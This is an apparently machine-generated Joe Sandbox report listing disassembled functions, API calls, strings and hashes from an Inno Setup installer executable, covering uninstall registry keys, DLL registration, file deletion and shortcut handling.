EstimatedSize, xrefs: 0046E7B7
URLUpdateInfo, xrefs: 0046E60D
MinorVersion, xrefs: 0046E709
Inno Setup: Setup Type, xrefs: 0046E381
URLInfoAbout, xrefs: 0046E5B6
Inno Setup: User, xrefs: 0046E362
QuietUninstallString, xrefs: 0046E55F
HelpLink, xrefs: 0046E5F0
Contact, xrefs: 0046E647
Inno Setup: Deselected Tasks, xrefs: 0046E406
Inno Setup: App Path, xrefs: 0046E2F6
MajorVersion, xrefs: 0046E6F7
Inno Setup: Selected Tasks, xrefs: 0046E3E7
5.4.3 (a), xrefs: 0046E2C6
Inno Setup: User Info: Serial, xrefs: 0046E448
InstallLocation, xrefs: 0046E316
Inno Setup: No Icons, xrefs: 0046E343

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseValue
String ID: " /SILENT$5.4.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3132538880-3969937391
Opcode ID: 71bf0240a3129147ee13e6640558464cd9191e7e711b82b587d853d2fb1423d6
Instruction ID: 7ce0d42d35b6fb1533783e616244207f763d0b1565f0a99f2df142306da66e40
Opcode Fuzzy Hash: 71bf0240a3129147ee13e6640558464cd9191e7e711b82b587d853d2fb1423d6
Instruction Fuzzy Hash: BB122238A001089FDB14DB96E981ADE73F5EF48704F20847BE8056B395EB79AD41CB5E

Function 00490E9C Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,00000000,00491391,?,?,?,?,00000000,00000000,00000000), ref: 00490EDC
FindWindowA.USER32(00000000,00000000), ref: 00490F0D

Strings

SENDMESSAGE, xrefs: 00490F61
SLEEP, xrefs: 00490EC6
FINDWINDOWBYWINDOWNAME, xrefs: 00490F25
SENDBROADCASTNOTIFYMESSAGE, xrefs: 0049114B
SENDBROADCASTMESSAGE, xrefs: 004910A9
SENDNOTIFYMESSAGE, xrefs: 00491013
LOADDLL, xrefs: 0049119F
REGISTERWINDOWMESSAGE, xrefs: 0049106F
POSTMESSAGE, xrefs: 00490FB7
CREATEMUTEX, xrefs: 004912BD
OEMTOCHARBUFF, xrefs: 004912EF
CHARTOOEMBUFF, xrefs: 00491332
FREEDLL, xrefs: 00491288
CALLDLLPROC, xrefs: 00491201
POSTBROADCASTMESSAGE, xrefs: 004910F7
FINDWINDOWBYCLASSNAME, xrefs: 00490EE9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 480ab60e7c3a22494411a4d2f8515043b0178ed1851d45873998ce7b47a7f75c
Instruction ID: 8c5c55a42f08b3608b522ebaba4d0d27a092f0c69c6fcde6237b95dd3cfeca8d
Opcode Fuzzy Hash: 480ab60e7c3a22494411a4d2f8515043b0178ed1851d45873998ce7b47a7f75c
Instruction Fuzzy Hash: 66C188A0B0060267EB14BB3E8C92A1E59999FC9708B11D93FF406EB79ADE3DDC05435D

Function 00457640 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237filesynchronizationprocessCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00498AF8,00000001,00000000,00000000,00457975,?,?,?,00000001,?,00457B8F,00000000,00457BA5,?,00000000,0049A628), ref: 0045768D
CreateFileMappingA.KERNEL32(000000FF,00498AF8,00000004,00000000,00002018,00000000), ref: 004576C5
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975,?,?,?), ref: 004576EC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004577F9
ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045794B,?,00498AF8,00000001,00000000,00000000,00457975), ref: 00457751

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

CloseHandle.KERNEL32(00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457810
WaitForSingleObject.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457849
GetLastError.KERNEL32(00000000,000000FF,00457B8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045785B
UnmapViewOfFile.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045792D
CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045793C
CloseHandle.KERNEL32(00000000,00457952,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457945

Strings

D, xrefs: 004577BA
CreateMutex, xrefs: 0045769B
LoadLibrary, xrefs: 004578A7
REGDLL mutex wait failed (%d, %d), xrefs: 0045786F
_RegDLL.tmp %u %u, xrefs: 004577A1
Spawning _RegDLL.tmp, xrefs: 0045766C
_isetup\_RegDLL.tmp, xrefs: 00457777
CreateProcess, xrefs: 00457802
ReleaseMutex, xrefs: 0045775A
REGDLL failed with exit code 0x%x, xrefs: 00457839
OleInitialize, xrefs: 00457895
REGDLL returned unknown result code %d, xrefs: 0045790C
CreateFileMapping, xrefs: 004576D3
GetProcAddress, xrefs: 004578B9
MapViewOfFile, xrefs: 004576FA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
API String ID: 4012871263-351310198
Opcode ID: a6b4c7358fbd695ee3c4b3f65973886a4d4d7f90e67e043aa9b17380e9a2ed16
Instruction ID: 83924714922b720040bdc1829d4bd497e207e2bebaa4b90c240c2e7d337cbd3a
Opcode Fuzzy Hash: a6b4c7358fbd695ee3c4b3f65973886a4d4d7f90e67e043aa9b17380e9a2ed16
Instruction Fuzzy Hash: FA915270E042159BDB10EFA9D845B9EB7B4EB44305F10857BE814EB383DB789948CB69

Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F

Strings

Ctl3dAutoSubclass, xrefs: 0041F223
BtnWndProc3d, xrefs: 0041F262
Ctl3dUnAutoSubclass, xrefs: 0041F238
Ctl3dRegister, xrefs: 0041F191
Ctl3dSubclassCtl, xrefs: 0041F1CF
Ctl3dDlgFramePaint, xrefs: 0041F1F9
Ctl3DColorChange, xrefs: 0041F24D
Ctl3dSubclassDlgEx, xrefs: 0041F1E4
Ctl3dCtlColorEx, xrefs: 0041F20E
CTL3D32.DLL, xrefs: 0041F159
Ctl3dUnregister, xrefs: 0041F1BA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: a664a352b8b01047ffddd7494001f45f57fbe8c0385c974e49bb3abafbeadb24
Instruction ID: 4bd2a82d3c21b9c69ed8d8a76c9dde097db88322f5e97d954110362e48e83bff
Opcode Fuzzy Hash: a664a352b8b01047ffddd7494001f45f57fbe8c0385c974e49bb3abafbeadb24
Instruction Fuzzy Hash: 723110B1640700EBDB00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D

Function 0041CA1C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
SelectObject.GDI32(00000000,?), ref: 0041CBFE
DeleteDC.GDI32(00000000), ref: 0041CC14

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
String ID:
API String ID: 1381628555-0
Opcode ID: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
Opcode Fuzzy Hash: 0f47872a13c127901087358d9df865229a2f9d400c2edbf0839bf343a180c7d1
Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68

Function 0042DFC4 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memorylibraryloaderCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2

Strings

CheckTokenMembership, xrefs: 0042E02A
advapi32.dll, xrefs: 0042E02F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 1717332306-1888249752
Opcode ID: 29d5ae8195f775f49d7c25a48d89becf885755ad8a578c1cf81dd03b0fbc71ed
Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
Opcode Fuzzy Hash: 29d5ae8195f775f49d7c25a48d89becf885755ad8a578c1cf81dd03b0fbc71ed
Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

Function 00496A98 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 251synchronizationCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000,004971F1,?,00000000), ref: 00496B1B
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000,?,004971E7,00000000), ref: 00496B2E
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000,00000000), ref: 00496B3E
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00496B5F
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000,?,00000000), ref: 00496B6F

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D

Strings

/REG, xrefs: 00496ACD
qI, xrefs: 00496E22
.lst, xrefs: 00496BAC
Setup, xrefs: 00496B07
.msg, xrefs: 00496B92
Inno-Setup-RegSvr-Mutex, xrefs: 00496B25
/REGU, xrefs: 00496AF1
(rI, xrefs: 00496BA9, 00496BB6, 00496DB1, 00496C07

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
API String ID: 2000705611-2592930226
Opcode ID: 140fbce59c223cf64c7f020d5cdfb6b22aef3624b05c3b8244ef62885c1d1664
Instruction ID: 4c11abcdbfb461b7d647ba7693d2f2a167619218498683e16ce031b9e504508c
Opcode Fuzzy Hash: 140fbce59c223cf64c7f020d5cdfb6b22aef3624b05c3b8244ef62885c1d1664
Instruction Fuzzy Hash: 2F91C534B042449FDF11EBA5C852BAF7BA5EB49308F524477F800AB682D63CAC01CB69

Function 004685C4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,004687DE,?,?,00000001,00000000,00000000,004687F9,?,00000000,00000000,?), ref: 004687C7

Strings

Inno Setup: Setup Type, xrefs: 004686D6
Inno Setup: Selected Components, xrefs: 004686E6
Inno Setup: Deselected Components, xrefs: 00468708
Inno Setup: User Info: Organization, xrefs: 00468796
Inno Setup: User Info: Serial, xrefs: 004687A9
Inno Setup: Deselected Tasks, xrefs: 00468755
Inno Setup: App Path, xrefs: 00468686
Inno Setup: Selected Tasks, xrefs: 00468733
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468623
Inno Setup: Icon Group, xrefs: 004686A2
%s\%s_is1, xrefs: 00468641
Inno Setup: No Icons, xrefs: 004686AF
Inno Setup: User Info: Name, xrefs: 00468783

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: e32e10dea245c260d887678a46b1fec455469e1d48aed9179da57e8e5731c267
Instruction ID: b5a6e33e5d6cd5810e5f3773d63e06d533fa2f0377129b81ba32e032a1e41e34
Opcode Fuzzy Hash: e32e10dea245c260d887678a46b1fec455469e1d48aed9179da57e8e5731c267
Instruction Fuzzy Hash: 7A51C470A002489BDB15DB55D941BDEB7F4EF45304FA082BEE840A73A1EB386F05CB5A

Function 00459EF8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045A1B4,?,?,?,?,?,00000006,?,00000000,00495ECB,?,00000000,00495F6E), ref: 0045A066

Strings

Stripped read-only attribute., xrefs: 0045A03F
Failed to strip read-only attribute., xrefs: 0045A04B
.gid, xrefs: 00459F48
The file appears to be in use (%d). Will delete on restart., xrefs: 0045A0AF
.chm, xrefs: 00459F94
.hlp, xrefs: 00459F2F
.chw, xrefs: 00459FAD
Failed to delete the file; it may be in use (%d)., xrefs: 0045A155
.lnk, xrefs: 00459FD3
Deleting file: %s, xrefs: 0045A005
.fts, xrefs: 00459F6C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: da62c1f694250ac29331ad462f6f2139b1f7f17ce1204e60940dfcc19afb791c
Instruction ID: 585700f695afdb727b25681db045cd46e0715bcc6ef46f3516a2bde87356df66
Opcode Fuzzy Hash: da62c1f694250ac29331ad462f6f2139b1f7f17ce1204e60940dfcc19afb791c
Instruction Fuzzy Hash: 6871B030B046045BCB01EF6988827AE7BA4AF49715F50856BFC01DB383DB7C9E5D875A

Function 0041B3BC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
SelectObject.GDI32(00000000,?), ref: 0041B480
SelectObject.GDI32(?,00000000), ref: 0041B48F
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
SelectObject.GDI32(?,00000000), ref: 0041B4D7
DeleteDC.GDI32(00000000), ref: 0041B4E0
DeleteDC.GDI32(?), ref: 0041B4E9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Object$Select$Delete$A26180A480A570Stretch
String ID:
API String ID: 359944910-0
Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4

Function 00471C4C Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 335COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471E04
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471F07
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471F1D
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471F42

Strings

.pif, xrefs: 00471CFB, 00471E8B
{group}\, xrefs: 00471CA6
target.lnk, xrefs: 00471F8C
Filename: %s, xrefs: 00471DA6
.lnk, xrefs: 00471CD8
Desktop.ini, xrefs: 00471FC3
.url, xrefs: 00471D1E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
